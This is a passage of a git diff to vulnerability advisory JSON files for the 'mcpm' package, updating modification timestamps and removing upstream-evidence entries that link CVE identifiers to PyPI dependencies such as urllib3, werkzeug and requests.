"strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-33880.json b/advisories/BREW-mcpm-CVE-2021-33880.json index 3150928396..b25107b288 100644 --- a/advisories/BREW-mcpm-CVE-2021-33880.json +++ b/advisories/BREW-mcpm-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-33880", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-41945.json b/advisories/BREW-mcpm-CVE-2021-41945.json index 5420b7e21b..5ad71216bb 100644 --- a/advisories/BREW-mcpm-CVE-2021-41945.json +++ b/advisories/BREW-mcpm-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-41945", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-0338.json b/advisories/BREW-mcpm-CVE-2022-0338.json index 33d94e6976..742c9d740f 100644 --- a/advisories/BREW-mcpm-CVE-2022-0338.json +++ b/advisories/BREW-mcpm-CVE-2022-0338.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-0338", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-39ph-wr67-j4xq", "CVE-2022-0338", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "loguru", - "subject_version": "0.7.3", - "key": "pkg:pypi/loguru@0.7.3", - "resource": "loguru" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-29217.json b/advisories/BREW-mcpm-CVE-2022-29217.json index 6eeb4e7d14..e3a7ceb5c5 100644 --- a/advisories/BREW-mcpm-CVE-2022-29217.json +++ b/advisories/BREW-mcpm-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-29217", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-40896.json b/advisories/BREW-mcpm-CVE-2022-40896.json index f609e4b146..e7ab70705c 100644 --- a/advisories/BREW-mcpm-CVE-2022-40896.json +++ b/advisories/BREW-mcpm-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-40896", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-23934.json b/advisories/BREW-mcpm-CVE-2023-23934.json index 1664f6993b..9834473e1c 100644 --- a/advisories/BREW-mcpm-CVE-2023-23934.json +++ b/advisories/BREW-mcpm-CVE-2023-23934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-23934", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-px8h-6qxv-m22q", "CVE-2023-23934", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-25577.json b/advisories/BREW-mcpm-CVE-2023-25577.json index 0bbc74c406..d8db689d03 100644 --- a/advisories/BREW-mcpm-CVE-2023-25577.json +++ b/advisories/BREW-mcpm-CVE-2023-25577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-25577", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-xg9f-g7g7-2323", "CVE-2023-25577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-26302.json b/advisories/BREW-mcpm-CVE-2023-26302.json index af02567b7f..916ec98e51 100644 --- a/advisories/BREW-mcpm-CVE-2023-26302.json +++ b/advisories/BREW-mcpm-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-26302", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-26303.json b/advisories/BREW-mcpm-CVE-2023-26303.json index 889da61a60..8482dcb45b 100644 --- a/advisories/BREW-mcpm-CVE-2023-26303.json +++ b/advisories/BREW-mcpm-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-26303", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-29159.json b/advisories/BREW-mcpm-CVE-2023-29159.json index cf3c1ab311..850f5756e4 100644 --- a/advisories/BREW-mcpm-CVE-2023-29159.json +++ b/advisories/BREW-mcpm-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-29159", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-29483.json b/advisories/BREW-mcpm-CVE-2023-29483.json index 25d6f36379..ec90b8a730 100644 --- a/advisories/BREW-mcpm-CVE-2023-29483.json +++ b/advisories/BREW-mcpm-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-29483", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-30798.json b/advisories/BREW-mcpm-CVE-2023-30798.json index ea60ba1b6e..fa8ad9f10e 100644 --- a/advisories/BREW-mcpm-CVE-2023-30798.json +++ b/advisories/BREW-mcpm-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-30798", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-32681.json b/advisories/BREW-mcpm-CVE-2023-32681.json index fd9aa3bdac..378d2959d4 100644 --- a/advisories/BREW-mcpm-CVE-2023-32681.json +++ b/advisories/BREW-mcpm-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-32681", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-43804.json b/advisories/BREW-mcpm-CVE-2023-43804.json index c6b2084b62..68a3e320ff 100644 --- a/advisories/BREW-mcpm-CVE-2023-43804.json +++ b/advisories/BREW-mcpm-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-43804", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-45803.json b/advisories/BREW-mcpm-CVE-2023-45803.json index 12586419d7..973bf828b3 100644 --- a/advisories/BREW-mcpm-CVE-2023-45803.json +++ b/advisories/BREW-mcpm-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-45803", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-46136.json b/advisories/BREW-mcpm-CVE-2023-46136.json index 76b64498e4..627c24d8cd 100644 --- a/advisories/BREW-mcpm-CVE-2023-46136.json +++ b/advisories/BREW-mcpm-CVE-2023-46136.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-46136", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hrfv-mqp8-q5rw", "CVE-2023-46136", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-24762.json b/advisories/BREW-mcpm-CVE-2024-24762.json index 48ba0eb0aa..31e09f3969 100644 --- a/advisories/BREW-mcpm-CVE-2024-24762.json +++ b/advisories/BREW-mcpm-CVE-2024-24762.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-24762", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2jv5-9r88-3w3p", "CVE-2024-24762", @@ -44,14 +44,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-34069.json b/advisories/BREW-mcpm-CVE-2024-34069.json index 56f97bb553..fcd3d3a258 100644 --- a/advisories/BREW-mcpm-CVE-2024-34069.json +++ b/advisories/BREW-mcpm-CVE-2024-34069.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-34069", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2g68-c3qc-8985", "CVE-2024-34069", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-35195.json b/advisories/BREW-mcpm-CVE-2024-35195.json index e40acd2fa6..e74eb0a020 100644 --- a/advisories/BREW-mcpm-CVE-2024-35195.json +++ b/advisories/BREW-mcpm-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-35195", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-3651.json b/advisories/BREW-mcpm-CVE-2024-3651.json index 2d428ed795..3c128cccb8 100644 --- a/advisories/BREW-mcpm-CVE-2024-3651.json +++ b/advisories/BREW-mcpm-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-3651", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-37568.json b/advisories/BREW-mcpm-CVE-2024-37568.json index d484de7b89..b44783286f 100644 --- a/advisories/BREW-mcpm-CVE-2024-37568.json +++ b/advisories/BREW-mcpm-CVE-2024-37568.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-37568", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5357-c2jx-v7qh", "CVE-2024-37568", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-37891.json b/advisories/BREW-mcpm-CVE-2024-37891.json index b62da0b34c..d43b18e5b7 100644 --- a/advisories/BREW-mcpm-CVE-2024-37891.json +++ b/advisories/BREW-mcpm-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-37891", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-41672.json b/advisories/BREW-mcpm-CVE-2024-41672.json index ca0751e745..e24f1e6f6d 100644 --- a/advisories/BREW-mcpm-CVE-2024-41672.json +++ b/advisories/BREW-mcpm-CVE-2024-41672.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-41672", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w2gf-jxc9-pf2q", "CVE-2024-41672", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "duckdb", - "subject_version": "1.5.4", - "key": "pkg:pypi/duckdb@1.5.4", - "resource": "duckdb" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-47081.json b/advisories/BREW-mcpm-CVE-2024-47081.json index ac00f9e2fc..1f08d38b2b 100644 --- a/advisories/BREW-mcpm-CVE-2024-47081.json +++ b/advisories/BREW-mcpm-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-47081", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-47874.json b/advisories/BREW-mcpm-CVE-2024-47874.json index 843f40f596..7aa8b6b38a 100644 --- a/advisories/BREW-mcpm-CVE-2024-47874.json +++ b/advisories/BREW-mcpm-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-47874", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-49766.json b/advisories/BREW-mcpm-CVE-2024-49766.json index 0d5817dcf3..36ffb4b820 100644 --- a/advisories/BREW-mcpm-CVE-2024-49766.json +++ b/advisories/BREW-mcpm-CVE-2024-49766.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-49766", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f9vj-2wh5-fj8j", "CVE-2024-49766", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-49767.json b/advisories/BREW-mcpm-CVE-2024-49767.json index 7dc7485200..713bcac3a6 100644 --- a/advisories/BREW-mcpm-CVE-2024-49767.json +++ b/advisories/BREW-mcpm-CVE-2024-49767.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-49767", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-q34m-jh98-gwm2", "CVE-2024-49767", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-53861.json b/advisories/BREW-mcpm-CVE-2024-53861.json index 7df577ae26..191a778d8c 100644 --- a/advisories/BREW-mcpm-CVE-2024-53861.json +++ b/advisories/BREW-mcpm-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-53861", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-53981.json b/advisories/BREW-mcpm-CVE-2024-53981.json index afc7bbe4cc..37defb1869 100644 --- a/advisories/BREW-mcpm-CVE-2024-53981.json +++ b/advisories/BREW-mcpm-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-53981", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-43859.json b/advisories/BREW-mcpm-CVE-2025-43859.json index 435aa76400..75489ab9d1 100644 --- a/advisories/BREW-mcpm-CVE-2025-43859.json +++ b/advisories/BREW-mcpm-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-43859", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-50181.json b/advisories/BREW-mcpm-CVE-2025-50181.json index 0c3cafe1e5..6b5d96b1ae 100644 --- a/advisories/BREW-mcpm-CVE-2025-50181.json +++ b/advisories/BREW-mcpm-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-50181", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-50182.json b/advisories/BREW-mcpm-CVE-2025-50182.json index 9923bea9a7..177be5ecf3 100644 --- a/advisories/BREW-mcpm-CVE-2025-50182.json +++ b/advisories/BREW-mcpm-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-50182", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-53365.json b/advisories/BREW-mcpm-CVE-2025-53365.json index 6ba267f738..abb298e89b 100644 --- a/advisories/BREW-mcpm-CVE-2025-53365.json +++ b/advisories/BREW-mcpm-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-53365", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-53366.json b/advisories/BREW-mcpm-CVE-2025-53366.json index 67e652eb67..ac5c6e0380 100644 --- a/advisories/BREW-mcpm-CVE-2025-53366.json +++ b/advisories/BREW-mcpm-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-53366", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { 